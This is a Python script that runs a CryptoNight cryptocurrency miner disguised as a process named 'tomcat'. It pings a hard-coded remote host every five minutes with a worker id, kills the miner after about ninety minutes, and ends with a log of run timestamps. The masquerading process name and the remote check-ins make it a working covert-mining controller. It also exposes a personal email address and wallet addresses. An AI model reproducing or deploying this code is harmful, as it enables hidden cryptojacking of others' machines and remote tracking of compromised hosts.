import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:27:06.424151
#2018-02-17 17:16:02.052338
#2018-02-17 19:03:01.487732
#2018-02-17 20:50:07.227668
#2018-02-17 22:37:04.928994
#2018-02-18 00:21:01.410607
#2018-02-18 02:12:05.552498
#2018-02-18 03:59:05.148672
#2018-02-18 05:47:03.618981
#2018-02-18 07:40:02.971851
#2018-02-18 09:27:01.888050
#2018-02-18 11:13:05.497454
#2018-02-18 13:00:05.539467
#2018-02-18 14:49:05.146420
#2018-02-18 16:37:06.332774
#2018-02-18 18:26:04.433775
#2018-02-18 20:13:01.483384
#2018-02-18 21:59:07.285259
#2018-02-18 23:48:04.589800
#2018-02-19 01:35:01.351205
#2018-02-19 03:22:06.193242
#2018-02-19 05:07:01.433227
#2018-02-19 06:52:01.474172
#2018-02-19 08:41:07.865542
#2018-02-19 10:30:08.440453
#2018-02-19 12:18:02.007032
#2018-02-19 14:05:08.592911
#2018-02-19 15:55:03.181739
#2018-02-19 17:42:06.538881
#2018-02-19 19:30:10.155790
#2018-02-19 21:19:07.518625
#2018-02-19 23:06:01.504114
#2018-02-20 00:52:06.202788
#2018-02-20 02:41:06.596322
#2018-02-20 04:30:08.690876
#2018-02-20 06:14:07.035174
#2018-02-20 07:59:07.111955
#2018-02-20 09:45:03.845098
#2018-02-20 11:29:06.966094
#2018-02-20 13:16:08.879008
#2018-02-20 15:00:11.530153
#2018-02-20 16:46:05.911219
#2018-02-20 18:34:08.498945
#2018-02-20 20:25:08.617761
#2018-02-20 22:11:01.242355
#2018-02-20 23:53:02.326991
#2018-02-21 01:37:04.115163
#2018-02-21 03:25:01.653993
#2018-02-21 05:12:06.488986
#2018-02-21 06:59:04.730964
#2018-02-21 08:46:08.204747
#2018-02-21 10:32:05.622106
#2018-02-21 12:21:07.114869
#2018-02-21 14:09:09.934348
#2018-02-21 15:56:10.531914
#2018-02-21 17:48:05.356879
#2018-02-21 19:35:06.256079
#2018-02-21 21:22:02.006864
#2018-02-21 23:08:06.236207
#2018-02-22 00:57:07.639135
#2018-02-22 02:47:05.384313
#2018-02-22 04:33:06.939993
#2018-02-22 06:18:01.249129
#2018-02-22 08:03:08.369040
#2018-02-22 09:51:08.812561
#2018-02-22 11:36:04.455053
#2018-02-22 13:23:04.589286
#2018-02-22 15:12:05.468214
#2018-02-22 16:56:10.257000
#2018-02-22 18:43:09.167712
#2018-02-22 20:36:02.128017
#2018-02-22 22:21:04.422732
#2018-02-23 00:07:06.621462
#2018-02-23 01:56:08.217045
#2018-02-23 03:45:06.433911
#2018-02-23 05:34:05.897733
#2018-02-23 07:20:07.473417
#2018-02-23 09:24:04.585742
#2018-02-23 11:29:01.651348
#2018-02-23 13:18:07.418459
#2018-02-23 15:05:01.585639
#2018-02-23 16:55:06.825483
#2018-02-23 18:43:08.228174
#2018-02-23 20:29:06.542695
#2018-02-23 22:16:04.338796
#2018-02-24 00:02:04.167168
#2018-02-24 01:51:03.902428
#2018-02-24 03:39:05.307007
#2018-02-24 05:23:04.976084
#2018-02-24 07:11:06.364775
#2018-02-24 09:01:06.476140
#2018-02-24 11:01:04.013612
#2018-02-24 12:48:06.535054
#2018-02-24 14:37:03.371376
#2018-02-24 16:23:07.246103
#2018-02-24 18:17:06.458378
#2018-02-24 20:04:01.841827
#2018-02-24 21:46:06.140043
#2018-02-25 00:45:07.403452
#2018-02-25 03:49:04.019689
#2018-02-25 06:36:05.723006
#2018-02-25 11:36:08.313120
#2018-02-25 13:20:03.906745
#2018-02-25 14:53:01.945667
#2018-02-25 16:26:01.903788